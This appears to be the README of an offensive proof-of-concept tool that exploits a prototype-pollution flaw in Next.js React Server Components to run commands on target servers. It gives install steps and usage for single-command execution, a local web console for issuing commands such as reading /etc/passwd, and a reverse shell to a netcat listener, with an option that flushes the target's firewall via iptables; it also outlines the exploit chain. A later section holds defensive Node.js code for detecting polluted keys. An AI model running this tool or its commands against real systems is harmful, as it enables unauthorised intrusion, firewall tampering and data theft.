
REACT2SHELL

🎯 Quick Overview (What is this?)

This tool is a simple Proof-of-Concept (PoC) exploit for CVE-2025-55182. This is a serious flaw (Prototype Pollution) found in Next.js applications that use React Server Components.

If a target server is vulnerable, this script lets you run operating system commands on it (Remote Code Execution, or RCE).

This tool is built for learning, CTFs, and responsible security research.


⚠️ Disclaimer for Students & CTF Players

USE ETHICALLY. Only run this exploit against systems you own or have explicit, documented permission to test. Unauthorized use is illegal. This tool is for educational purposes only.

🌟 How to Use It

This tool has three main ways to run commands: a simple single command, a full interactive web console, and an attempt at a classic reverse shell.

βš™οΈ Installation

  1. Get the code (the clone is placed in a directory named REACT2SHELL so the next step works):

    git clone https://github.com/raivenLockdown/RCE_React2Shell_ButCooler-SomeUselessUsefulThingsLMAO-.git REACT2SHELL
    cd REACT2SHELL
  2. Install the required Python library:

    pip install requests

Mode 1: Interactive Web Console (Recommended for CTFs)

This is the easiest way to interact with the target. It starts a local web page on your machine that acts like a terminal.

  1. Run the script:

    python3 exploit.py <TARGET_URL> --web-cli

    Example: python3 exploit.py http://target.com/ --web-cli

  2. Open your browser: The script will tell you to open http://127.0.0.1:8000/. You can then type commands (like ls, whoami, cat /etc/passwd) directly into the web page.

Mode 2: Single Command Execution

Run one command and get the output immediately in your local terminal. Good for quick checks like finding your user ID.

python3 exploit.py <TARGET_URL> --cmd '<COMMAND>'

Example: python3 exploit.py http://target.com/ --cmd 'id'

Mode 3: Reverse Shell Attempt

Use this mode if you want a stable, persistent connection. Note: This often fails in real-world environments due to firewalls (egress filtering).

  1. Start your listener (e.g., netcat):

    nc -lvnp 55555
  2. Run the exploit:

    python3 exploit.py <TARGET_URL> -i <YOUR_IP> -p 55555 [--flush]
    • -i <YOUR_IP>: Your machine's IP.
    • -p 55555: The port your listener is using.
    • --flush (Optional): Tries to run iptables -F on the target first to clear host firewalls.

🔬 Technical Explanation (How the Exploit Works)

The exploit uses a Prototype Pollution flaw to achieve RCE.

  1. Prototype Pollution: The script sends a specially crafted payload to a vulnerable Next.js endpoint. This payload exploits a flaw in how the server processes data, allowing us to add properties to the basic JavaScript object structure (Object.prototype).
  2. RCE Trigger: We pollute a specific, internal property that controls what code the server runs (using Node.js's child_process). We replace that property's value with our shell command.
  3. Output Capture: When running commands in the single-command or web CLI modes, the exploit makes the server execute the command (execSync) and immediately throw a harmless error. The output of the command is cleverly stuffed into the error message's digest field. The Python script then reads this field to get the results.
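As an added defensive example (not code from this repository), the following Node.js snippet shows the two controls that break the chain described above on the server side: rejecting request bodies that carry `__proto__`, `constructor` or `prototype` keys before they are processed, and a merge routine that cannot write to Object.prototype. The helper names and the sample bodies are this example's own.

```javascript
// Added defensive example (not part of the REACT2SHELL tool): detect prototype-pollution
// keys in untrusted JSON and merge safely. Helper names below are this example's own.

// Keys through which a recursive merge of attacker data can reach Object.prototype.
const DANGEROUS_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Walk a parsed JSON value and return the path of every dangerous key found.
// JSON.parse stores "__proto__" as an own property, so Object.keys does see it.
function findPollutionKeys(value, path = "") {
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((item, i) => hits.push(...findPollutionKeys(item, `${path}/${i}`)));
  } else if (value !== null && typeof value === "object") {
    for (const key of Object.keys(value)) {
      const here = `${path}/${key}`;
      if (DANGEROUS_KEYS.has(key)) hits.push(here);
      hits.push(...findPollutionKeys(value[key], here));
    }
  }
  return hits;
}

// Decide whether a raw request body should be rejected before any merge runs.
function inspectBody(rawBody) {
  let parsed;
  try { parsed = JSON.parse(rawBody); } catch { return { reject: true, reason: "invalid JSON", hits: [] }; }
  const hits = findPollutionKeys(parsed);
  return { reject: hits.length > 0, reason: hits.length ? "pollution key" : "ok", hits };
}

// Hardened recursive merge: dangerous keys are dropped, and nested targets are
// created only as own plain objects, so no write can land on a prototype.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (DANGEROUS_KEYS.has(key)) continue;
    const val = source[key];
    if (val !== null && typeof val === "object" && !Array.isArray(val)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || typeof target[key] !== "object" || target[key] === null) target[key] = {};
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Constructed sample bodies (not captured traffic).
const BENIGN_BODY = '{"user":{"name":"alice","prefs":{"theme":"dark"}}}';
const SUSPECT_BODY = '{"user":{"name":"bob"},"__proto__":{"polluted":"yes"}}';
```

In a real service the inspectBody check belongs in request-parsing middleware, and a rejected body is worth logging with its reported paths, since those paths are the detection signal for this whole vulnerability class.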

🤝 References and Credits

This research relies on the initial work and disclosure by the security community. Thank you to all researchers and open-source contributors.

📚 Key References
